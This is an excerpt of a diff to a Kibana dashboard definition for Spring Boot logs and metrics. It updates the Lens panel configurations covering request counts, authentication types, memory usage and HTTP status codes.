"logs-*", + "name": "indexpattern-datasource-layer-25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "197542f3-0a77-4046-a21d-9e87d097f9d9", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "5fab4c2b-f8e3-499d-946f-f7a8bdcbbbd9", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c": { + "columnOrder": [ + "e65b0651-a054-45ff-9e39-c835bc2e45ee" + ], + "columns": { + "e65b0651-a054-45ff-9e39-c835bc2e45ee": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": " ", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "197542f3-0a77-4046-a21d-9e87d097f9d9", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.http_trace" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.http_trace" + } + } }, - "panelIndex": "b55e357e-4c45-430c-ae63-2c6facaabc2e", - "panelRefName": "panel_b55e357e-4c45-430c-ae63-2c6facaabc2e", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "5fab4c2b-f8e3-499d-946f-f7a8bdcbbbd9", + "key": "http.response.status_code", + "negate": false, + "params": { + "query": 200 + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "http.response.status_code": 200 + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "e65b0651-a054-45ff-9e39-c835bc2e45ee", + "layerId": "25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - 
"references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "197542f3-0a77-4046-a21d-9e87d097f9d9", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "5fab4c2b-f8e3-499d-946f-f7a8bdcbbbd9", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total successful requests [Logs Spring Boot]" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "73272b0b-e1d4-4a44-9904-adaad0d24159": { + "columnOrder": [ + "2fe1f301-207a-48ff-aa1c-13aaed31b9db", + "1b8c4683-1d76-49cc-95c8-691612657847" + ], + "columns": { + "1b8c4683-1d76-49cc-95c8-691612657847": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "params": { + "format": { + "id": "number", + "params": { + "decimals": 2 + } } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c": { - "columnOrder": [ - "e65b0651-a054-45ff-9e39-c835bc2e45ee" - ], - "columns": { - "e65b0651-a054-45ff-9e39-c835bc2e45ee": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": " ", - "operationType": "count", - "scale": "ratio", - "sourceField": "___records___" - } - }, - "incompleteColumns": {} - } - } - } + }, + "scale": "ratio", + "sourceField": "___records___" + }, + "2fe1f301-207a-48ff-aa1c-13aaed31b9db": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Authentication Type", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": 
"1b8c4683-1d76-49cc-95c8-691612657847", + "type": "column" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "197542f3-0a77-4046-a21d-9e87d097f9d9", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.http_trace" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.http_trace" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "5fab4c2b-f8e3-499d-946f-f7a8bdcbbbd9", - "key": "http.response.status_code", - "negate": false, - "params": { - "query": 200 - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "http.response.status_code": 200 - } - } - } - ], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" }, - "visualization": { - "accessor": "e65b0651-a054-45ff-9e39-c835bc2e45ee", - "layerId": "25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "size": 5 + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.type" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.audit_events" }, - "enhancements": {}, - "hidePanelTitles": false, - "type": "lens" - }, - "gridData": { - "h": 6, - "i": "8da90917-936b-49b2-a845-24db7da4681e", - "w": 9, - "x": 20, - "y": 0 - }, - "panelIndex": "8da90917-936b-49b2-a845-24db7da4681e", - "title": "Total successful requests [Logs Spring Boot]", - "type": "lens", - "version": "8.2.0" + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.audit_events" + } + } + 
} + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "layerId": "73272b0b-e1d4-4a44-9904-adaad0d24159", + "layerType": "data", + "legendDisplay": "show", + "legendMaxLines": 1, + "legendPosition": "bottom", + "nestedLegend": true, + "numberDisplay": "percent", + "truncateLegend": true, + "legendSize": "auto", + "primaryGroups": [ + "2fe1f301-207a-48ff-aa1c-13aaed31b9db" + ], + "metrics": [ + "1b8c4683-1d76-49cc-95c8-691612657847" + ] + } + ], + "shape": "pie" + } }, - { - "embeddableConfig": { - "enhancements": {} - }, - "gridData": { - "h": 18, - "i": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb", - "w": 19, - "x": 29, - "y": 0 + "title": "Authentication type [Logs Spring Boot]", + "visualizationType": "lnsPie", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-73272b0b-e1d4-4a44-9904-adaad0d24159", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "b7a7b7d1-61be-48a9-9158-7f778b4ddaf2", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 18, + "i": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb", + "w": 19, + "x": 29, + "y": 0 + }, + "panelIndex": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb", + "type": "lens", + "version": "8.6.0" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "44a2b9a5-626c-426b-8bbb-921b56040444", + "w": 9, + "x": 20, + "y": 6 + }, + "panelIndex": "44a2b9a5-626c-426b-8bbb-921b56040444", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-a41a8eed-69fe-4838-b8f5-b322f7661832", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "fa18f56b-ae06-4e5e-96e4-b1f68ce9a35f", + "type": "index-pattern" + }, 
+ { + "id": "logs-*", + "name": "0e57fdc9-82ca-45c5-bdfa-57704436ea9a", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "a41a8eed-69fe-4838-b8f5-b322f7661832": { + "columnOrder": [ + "58748aeb-032e-407b-9c76-7e41c419b1a8" + ], + "columns": { + "58748aeb-032e-407b-9c76-7e41c419b1a8": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": " ", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "fa18f56b-ae06-4e5e-96e4-b1f68ce9a35f", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.http_trace" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.http_trace" + } + } }, - "panelIndex": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb", - "panelRefName": "panel_3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "0e57fdc9-82ca-45c5-bdfa-57704436ea9a", + "key": "http.response.status_code", + "negate": true, + "params": { + "query": 200 + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "http.response.status_code": 200 + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "58748aeb-032e-407b-9c76-7e41c419b1a8", + "layerId": "a41a8eed-69fe-4838-b8f5-b322f7661832", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "logs-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "indexpattern-datasource-layer-a41a8eed-69fe-4838-b8f5-b322f7661832", - 
"type": "index-pattern" - }, - { - "id": "logs-*", - "name": "fa18f56b-ae06-4e5e-96e4-b1f68ce9a35f", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "0e57fdc9-82ca-45c5-bdfa-57704436ea9a", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "a41a8eed-69fe-4838-b8f5-b322f7661832": { - "columnOrder": [ - "58748aeb-032e-407b-9c76-7e41c419b1a8" - ], - "columns": { - "58748aeb-032e-407b-9c76-7e41c419b1a8": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": " ", - "operationType": "count", - "scale": "ratio", - "sourceField": "___records___" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "fa18f56b-ae06-4e5e-96e4-b1f68ce9a35f", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.http_trace" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.http_trace" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "0e57fdc9-82ca-45c5-bdfa-57704436ea9a", - "key": "http.response.status_code", - "negate": true, - "params": { - "query": 200 - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "http.response.status_code": 200 - } - } - } - ], - "query": { - "language": "kuery", - "query": "" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total failed requests [Logs Spring Boot]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "d227dc3c-7902-44e7-b367-36bee05b96ab", + "w": 9, + "x": 20, + "y": 12 + }, + "panelIndex": "d227dc3c-7902-44e7-b367-36bee05b96ab", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": 
"indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-3e8e41c2-e9bd-4bf7-9e82-d478063ca973", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e3a2a6e7-f5c1-484a-bbe7-6dd3df9e258b", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "0a93fba6-6f3f-4f2c-a19e-ead075b97111", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "3e8e41c2-e9bd-4bf7-9e82-d478063ca973": { + "columnOrder": [ + "523fb967-5b16-44a7-b663-0f5aa6452db8" + ], + "columns": { + "523fb967-5b16-44a7-b663-0f5aa6452db8": { + "customLabel": true, + "dataType": "number", + "filter": { + "language": "kuery", + "query": "spring_boot.threading.threads.current.allocated_bytes : *" + }, + "isBucketed": false, + "label": " ", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 1 + } }, - "visualization": { - "accessor": "58748aeb-032e-407b-9c76-7e41c419b1a8", - "layerId": "a41a8eed-69fe-4838-b8f5-b322f7661832", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.threading.threads.current.allocated_bytes" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "e3a2a6e7-f5c1-484a-bbe7-6dd3df9e258b", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.threading" }, - "enhancements": {}, - "hidePanelTitles": false, - "type": "lens" - }, - "gridData": { - "h": 6, - "i": "44a2b9a5-626c-426b-8bbb-921b56040444", - "w": 9, - "x": 20, - "y": 6 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.threading" + } + } }, - "panelIndex": 
"44a2b9a5-626c-426b-8bbb-921b56040444", - "title": "Total failed requests [Logs Spring Boot]", - "type": "lens", - "version": "8.2.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "0a93fba6-6f3f-4f2c-a19e-ead075b97111", + "key": "spring_boot.threading.threads.current.allocated_bytes", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "spring_boot.threading.threads.current.allocated_bytes" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "523fb967-5b16-44a7-b663-0f5aa6452db8", + "colorMode": "None", + "layerId": "3e8e41c2-e9bd-4bf7-9e82-d478063ca973", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-3e8e41c2-e9bd-4bf7-9e82-d478063ca973", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e3a2a6e7-f5c1-484a-bbe7-6dd3df9e258b", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "0a93fba6-6f3f-4f2c-a19e-ead075b97111", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "3e8e41c2-e9bd-4bf7-9e82-d478063ca973": { - "columnOrder": [ - "523fb967-5b16-44a7-b663-0f5aa6452db8" - ], - "columns": { - "523fb967-5b16-44a7-b663-0f5aa6452db8": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "spring_boot.threading.threads.current.allocated_bytes : *" - }, - "isBucketed": false, - "label": " ", - "operationType": "last_value", - "params": { - "format": { - "id": "bytes", - "params": { - "decimals": 1 - } - }, - "showArrayValues": true, - "sortField": "@timestamp" - }, - "scale": "ratio", - 
"sourceField": "spring_boot.threading.threads.current.allocated_bytes" - } - }, - "incompleteColumns": {} - } - } - } + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Total memory of current thread in system [Metrics Spring Boot]" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "31ad067d-6820-43dc-a6fd-7a32a6a121f5": { + "columnOrder": [ + "ce51dd8d-7fd5-4ebf-a835-9ffe83125746", + "07747e2a-9e75-47d8-b1d4-87c0340cf60d", + "9b2297d6-8625-44a3-a7ba-633da40efcfb" + ], + "columns": { + "07747e2a-9e75-47d8-b1d4-87c0340cf60d": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Heap Used", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "e3a2a6e7-f5c1-484a-bbe7-6dd3df9e258b", - "key": "event.dataset", - "negate": false, - "params": { - "query": "spring_boot.threading" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "spring_boot.threading" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "0a93fba6-6f3f-4f2c-a19e-ead075b97111", - "key": "spring_boot.threading.threads.current.allocated_bytes", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "spring_boot.threading.threads.current.allocated_bytes" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.memory.heap.used" + }, + "9b2297d6-8625-44a3-a7ba-633da40efcfb": { + "customLabel": true, + "dataType": 
"number", + "isBucketed": false, + "label": "Non Heap Used", + "operationType": "last_value", + "params": { + "format": { + "id": "bytes", + "params": { + "decimals": 0 + } }, - "visualization": { - "accessor": "523fb967-5b16-44a7-b663-0f5aa6452db8", - "colorMode": "None", - "layerId": "3e8e41c2-e9bd-4bf7-9e82-d478063ca973", - "layerType": "data" - } + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "spring_boot.memory.non_heap.used" }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "ce51dd8d-7fd5-4ebf-a835-9ffe83125746": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": true, + "includeEmptyRows": false, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "8a86b358-6960-40ef-91ed-05c2c2e7c40f", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.memory" }, - "enhancements": {}, - "hidePanelTitles": false, - "type": "lens" - }, - "gridData": { - "h": 6, - "i": "d227dc3c-7902-44e7-b367-36bee05b96ab", - "w": 9, - "x": 20, - "y": 12 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.memory" + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "accessors": [ + "07747e2a-9e75-47d8-b1d4-87c0340cf60d", + "9b2297d6-8625-44a3-a7ba-633da40efcfb" + ], + "layerId": "31ad067d-6820-43dc-a6fd-7a32a6a121f5", + "layerType": "data", + "position": "top", + "seriesType": "line", + "showGridlines": false, + "xAccessor": "ce51dd8d-7fd5-4ebf-a835-9ffe83125746" + } + ], + "legend": { + "isVisible": true, + "legendSize": "auto", + "position": "right", + "showSingleSeries": true }, - 
"panelIndex": "d227dc3c-7902-44e7-b367-36bee05b96ab", - "title": "Total memory of current thread in system [Metrics Spring Boot]", - "type": "lens", - "version": "8.2.0" - }, - { - "embeddableConfig": { - "enhancements": {} + "preferredSeriesType": "line", + "title": "Empty XY chart", + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" }, - "gridData": { - "h": 17, - "i": "47822937-f8de-43cd-8000-b0c08d933804", - "w": 20, - "x": 0, - "y": 12 + "yRightExtent": { + "mode": "full" }, - "panelIndex": "47822937-f8de-43cd-8000-b0c08d933804", - "panelRefName": "panel_47822937-f8de-43cd-8000-b0c08d933804", - "type": "lens", - "version": "8.1.0" + "yTitle": "Memory" + } }, - { - "embeddableConfig": { - "enhancements": {} + "title": "Heap and non-heap memory [Metrics Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-31ad067d-6820-43dc-a6fd-7a32a6a121f5", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "8a86b358-6960-40ef-91ed-05c2c2e7c40f", + "type": "index-pattern" + } + ] + } + }, + "gridData": { + "h": 17, + "i": "47822937-f8de-43cd-8000-b0c08d933804", + "w": 20, + "x": 0, + "y": 12 + }, + "panelIndex": "47822937-f8de-43cd-8000-b0c08d933804", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "12461a5e-412f-4380-9b8a-d4dfe0fa20bc": { + "columnOrder": [ + "2dbf54bf-2147-4302-902b-a176ae9df338", + "21757728-2591-42a8-bed5-10cc5c097d85", + "9a043bf0-329d-4632-a095-86760550bd75" + ], + "columns": { + "21757728-2591-42a8-bed5-10cc5c097d85": { + "dataType": "number", + "isBucketed": true, + "label": "http.response.status_code", + "operationType": "range", + "params": { + "maxBars": "auto", + "ranges": [ + { + "from": 0, + "label": "", + "to": 1000 + } + ], + "type": "histogram" + }, + "scale": "interval", + 
"sourceField": "http.response.status_code" + }, + "2dbf54bf-2147-4302-902b-a176ae9df338": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "includeEmptyRows": true, + "interval": "1m" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "9a043bf0-329d-4632-a095-86760550bd75": { + "dataType": "number", + "isBucketed": false, + "label": "Count of records", + "operationType": "count", + "scale": "ratio", + "sourceField": "___records___" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "ba5b5f52-398a-48c9-8021-520aa78ccdba", + "key": "event.dataset", + "negate": false, + "params": { + "query": "spring_boot.http_trace" + }, + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "spring_boot.http_trace" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 11, - "i": "16610775-6aaa-4759-a3eb-a67c55f5d780", - "w": 28, - "x": 20, - "y": 18 + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "panelIndex": "16610775-6aaa-4759-a3eb-a67c55f5d780", - "panelRefName": "panel_16610775-6aaa-4759-a3eb-a67c55f5d780", - "type": "lens", - "version": "8.1.0" - }, - { - "embeddableConfig": { - "enhancements": {} + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 14, - "i": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29", - "w": 31, - "x": 0, - "y": 29 + "layers": [ + { + "accessors": [ + "9a043bf0-329d-4632-a095-86760550bd75" + ], + "layerId": "12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "layerType": "data", + "position": "top", + "seriesType": "bar", + "showGridlines": false, + "splitAccessor": 
"21757728-2591-42a8-bed5-10cc5c097d85", + "xAccessor": "2dbf54bf-2147-4302-902b-a176ae9df338" + } + ], + "legend": { + "horizontalAlignment": "right", + "isInside": false, + "isVisible": true, + "maxLines": 1, + "position": "right", + "shouldTruncate": false, + "showSingleSeries": false, + "verticalAlignment": "top", + "legendSize": "auto" }, - "panelIndex": "1f75e59b-5626-4dce-ac6d-f7ee2b71bb29", - "panelRefName": "panel_1f75e59b-5626-4dce-ac6d-f7ee2b71bb29", - "type": "lens", - "version": "8.1.0" - }, - { - "embeddableConfig": { - "enhancements": {}, - "hidePanelTitles": false + "preferredSeriesType": "bar", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true }, - "gridData": { - "h": 14, - "i": "7549bdf0-d5de-4851-9e9f-867a65684052", - "w": 17, - "x": 31, - "y": 29 + "valueLabels": "hide", + "valuesInLegend": true, + "yLeftExtent": { + "mode": "full" }, - "panelIndex": "7549bdf0-d5de-4851-9e9f-867a65684052", - "panelRefName": "panel_7549bdf0-d5de-4851-9e9f-867a65684052", - "title": "HTTP Request method types [Logs Spring Boot]", - "type": "lens", - "version": "8.1.0" - } - ], - "timeRestore": false, - "title": "[Spring Boot] Overview Dashboard", - "version": 1 - }, - "coreMigrationVersion": "8.2.0", - "id": "spring_boot-e8507040-c7b0-11ec-9c82-4b3dfe36a746", - "migrationVersion": { - "dashboard": "8.2.0" - }, - "references": [ - { - "id": "spring_boot-aefe6620-ca13-11ec-b4b1-b57f75afa7dd", - "name": "b55e357e-4c45-430c-ae63-2c6facaabc2e:panel_b55e357e-4c45-430c-ae63-2c6facaabc2e", - "type": "lens" - }, - { - "id": "logs-*", - "name": "8da90917-936b-49b2-a845-24db7da4681e:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "8da90917-936b-49b2-a845-24db7da4681e:indexpattern-datasource-layer-25d74ab0-7fd1-47c2-aaa5-bd9d13d5772c", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "8da90917-936b-49b2-a845-24db7da4681e:197542f3-0a77-4046-a21d-9e87d097f9d9", - "type": 
"index-pattern" - }, - { - "id": "logs-*", - "name": "8da90917-936b-49b2-a845-24db7da4681e:5fab4c2b-f8e3-499d-946f-f7a8bdcbbbd9", - "type": "index-pattern" - }, - { - "id": "spring_boot-aa0c95c0-c7f1-11ec-986a-f1e84447fd00", - "name": "3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb:panel_3a6a263d-dec2-4f86-9b9d-8bdb6cea9ecb", - "type": "lens" - }, - { - "id": "logs-*", - "name": "44a2b9a5-626c-426b-8bbb-921b56040444:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "44a2b9a5-626c-426b-8bbb-921b56040444:indexpattern-datasource-layer-a41a8eed-69fe-4838-b8f5-b322f7661832", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "44a2b9a5-626c-426b-8bbb-921b56040444:fa18f56b-ae06-4e5e-96e4-b1f68ce9a35f", - "type": "index-pattern" - }, - { - "id": "logs-*", - "name": "44a2b9a5-626c-426b-8bbb-921b56040444:0e57fdc9-82ca-45c5-bdfa-57704436ea9a", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:indexpattern-datasource-layer-3e8e41c2-e9bd-4bf7-9e82-d478063ca973", - "type": "index-pattern" + "yRightExtent": { + "mode": "full" + } + } + }, + "title": "HTTP Request status code [Logs Spring Boot]", + "visualizationType": "lnsXY", + "references": [ + { + "id": "logs-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "indexpattern-datasource-layer-12461a5e-412f-4380-9b8a-d4dfe0fa20bc", + "type": "index-pattern" + }, + { + "id": "logs-*", + "name": "ba5b5f52-398a-48c9-8021-520aa78ccdba", + "type": "index-pattern" + } + ] + } }, - { - "id": "metrics-*", - "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:e3a2a6e7-f5c1-484a-bbe7-6dd3df9e258b", - "type": "index-pattern" + "gridData": { + "h": 11, + "i": "16610775-6aaa-4759-a3eb-a67c55f5d780", + "w": 28, + 
"x": 20, + "y": 18 }, - { - "id": "metrics-*", - "name": "d227dc3c-7902-44e7-b367-36bee05b96ab:0a93fba6-6f3f-4f2c-a19e-ead075b97111", - "type": "index-pattern" + "panelIndex": "16610775-6aaa-4759-a3eb-a67c55f5d780", + "type": "lens", + "version": "8.6.0" + }, + { + "embeddableConfig": { + "enhancements": {}, + "attributes": { + "description": "", + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "41dbf555-e40a-45dc-83d7-18b18263e8de": { + "columnOrder": [ + "3624c7a7-411d-4138-9fdf-8b8a0694d285", + "769bee1d-5cdf-49f1-9fa3-53ce8f2388c8", + "a84b9b2d-8712-4975-a242-7996161a71da", + "5209c821-5ae2-40d6-b2c5-321b76c96ebc", + "52932019-4385-469b-9f4d-6becd3a912f6", + "5c3ff6ac-16ca-4b9b-912d-a47e7c7d7081" + ], + "columns": { + "3624c7a7-411d-4138-9fdf-8b8a0694d285": { + "dataType": "string", + "isBucketed": true, + "label": "Top 100 values of spring_boot.audit_events.document_id", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" + }, + "orderDirection": "asc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 100 + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.document_id" + }, + "5209c821-5ae2-40d6-b2c5-321b76c96ebc": { + "customLabel": true, + "dataType": "string", + "isBucketed": false, + "label": "Host", + "operationType": "last_value", + "params": { + "showArrayValues": true, + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "spring_boot.audit_events.data.remote_address" + }, + "52932019-4385-469b-9f4d-6becd3a912f6": { + 